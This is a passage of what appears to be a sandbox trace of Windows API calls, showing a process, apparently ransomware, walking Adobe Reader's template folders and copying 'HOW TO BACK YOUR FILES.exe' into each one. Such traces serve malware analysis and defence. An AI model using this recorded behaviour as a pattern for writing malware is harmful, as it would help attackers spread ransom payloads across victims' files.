(x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ita\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.411] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.411] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561ad740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561ad740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.411] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.411] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.411] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN" [0061.411] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN" [0061.412] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.412] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.418] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561d38a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561d38a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.418] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.418] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.419] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV" [0061.419] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV" [0061.419] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.419] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hrv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.424] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.424] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561d38a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561d38a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.424] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.424] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.424] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA" [0061.424] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA" [0061.424] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.424] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\fra\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.428] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\FRA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561d38a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561d38a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.428] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.428] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.428] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ" [0061.428] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ" [0061.428] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.429] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\euq\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.432] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.432] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\EUQ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561f9a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561f9a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.432] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.432] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.433] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP" [0061.433] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP" [0061.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\esp\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.446] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.447] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ESP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5621fb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5621fb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.447] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.447] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.447] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU" [0061.447] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU" [0061.447] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.447] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\enu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.452] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.452] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ENU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8058e120, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5621fb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5621fb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.452] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.452] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.453] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU" [0061.453] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU" [0061.453] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.453] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\deu\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.457] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.457] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8058e120, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5621fb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5621fb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.457] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.457] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.457] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN" [0061.457] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN" [0061.457] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.457] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.462] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.463] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80378de0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56245cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56245cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.463] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.463] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.463] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE" [0061.463] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE" [0061.463] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.463] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cze\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.467] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.467] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CZE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56245cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56245cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.467] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.467] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.467] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT" [0061.467] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT" [0061.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cht\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.472] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8039ef40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56245cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56245cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.473] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.473] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS" [0061.473] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS" [0061.473] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.473] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.478] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.478] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8039ef40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5626be20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5626be20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.479] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.479] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.479] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT" [0061.479] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT" [0061.479] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.479] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.484] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.484] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5626be20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5626be20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.485] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.485] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.485] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 